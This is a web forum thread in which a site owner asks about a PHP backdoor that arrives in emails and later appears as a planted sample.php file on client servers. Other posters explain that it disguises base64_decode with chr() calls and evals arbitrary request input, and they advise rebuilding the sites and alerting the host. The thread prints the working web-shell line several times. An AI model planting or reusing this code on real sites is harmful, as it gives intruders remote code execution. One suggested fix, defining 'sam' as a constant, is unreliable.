Hi all,
Recently, I have started receiving php scripts via email.
(no subject)
Inbox
< … script language=“php”> $a=chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101); eval($a($_REQUEST[sam]));</script … >
My sites have been getting hacked lately. Any ideas on what type attack this is and how I can stop it?
Thanks
A vulnerable Contact form?
I use Contact 7 in Wordpress, but I removed the form page from the site. They can still access the plugin?
I just spoke with my hosting Live Chat. I couldn’t see the headers in the e-mail. The guy said it appears to be from Amazon. Not malicious. When I Google the script, however, it comes up “attack and defence” (sic) script.
Sounds odd that Amazon would go to the trouble of the "$a = " when all they need to do is
base64_decode($_REQUEST[sam])
And why REQUEST (both POST and GET) ?
Do you know what “sam” is?
surface to air missile?
Google showed it to be Wordpress ‘simple ads manager.’
Also brought up
I took a quick look through Contact 7 and found no “sam”.
“simple ad manager” is likely the vulnerable script.
Seeing as
IMHO it is time to delete that plugin at least until it gets patched.
And if a backdoor has been uploaded to your site, time to backup your database and do a thorough replacement of all folders and files.
Sorry … I meant Google linked ‘sam’ with simple ad manager. I don’t use Simple Ad Manager. But, yeah, it appears as if a start-from-scratch strategy is the best.
What is the PHP chr function used for? What could they gain? I don’t have proprietary information or anything. And I really do not understand the this lead … http://www.hackingwithphp.com/4/7/3/converting-to-and-from-ascii
In this case it is being used to make base64_decode not be easily noticeable.
As for Amazon, no benefit that I can see. Why would they want to hide that if it’s legit?
If a script-kiddie on the other hand, it would make them feel “clever” and it would get by filters that look for the use of that function name as a string.
Irony is that most look for the function name “eval” so it’s moot here. The code will still trigger a red flag.
That… would be a security hole a mile wide. eval(base64_decode($_REQUEST[sam]));… "Take WHATEVER i put on the URL in the ‘sam’ variable and execute it. Whatever it is. sam = “unlink(index.php)”? Blow up your index file. dump your password file to the screen? Sure thing! Open up a hole into your database? Not a problem.
Agreed. But not knowing where “sam” is coming from, until determined what to do?
I’m thinking adding a DEFINE for “sam” as a CONSTANT into to the config file might help.
I got several of these emails and went back and looked to see if all of them were looking for ‘sam.’ One was not. It was
<?php =chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101); eval(());Okay, I run multiple sites for clients and I just
I just re-checked site, and there is a ‘sample’ php file on there, and it contains the one line: < … script language=“php”>
$a=chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);
eval($a($_REQUEST[sam]));
So email amazon’s spoofer email (stop-spoofing@amazon.com), attach the email in question, and tell them that someone appears to be using one of their clients’ contact systems as an attempt at hacking a site. (though why the email came to YOU is a good question.)
Why it came to me? Not sure why me specifically. My hosting account was suspended recently due to high-volume of CPU usage. These were just portfolio-type design sites, so I went through and deleted all the files and deleted the Wordpress installation. I changed the FTP password, but evidently my master account pw has been obtained because within 2 hours, this maddening sample.php file has appeared.
Wait… this code was in a file that you didnt create, sitting on your server?
Contact your hosting company again. Tell them their server’s been breached, and they need to do a complete system sweep on all accounts on the box.
Yes, I’m live-chatting with them at this moment. 70% of my client sites have this weird sample.php file on them.
Yes, it could very well be a shell with group affecting every sharing site and not only your site in particular.
The host really needs to know this.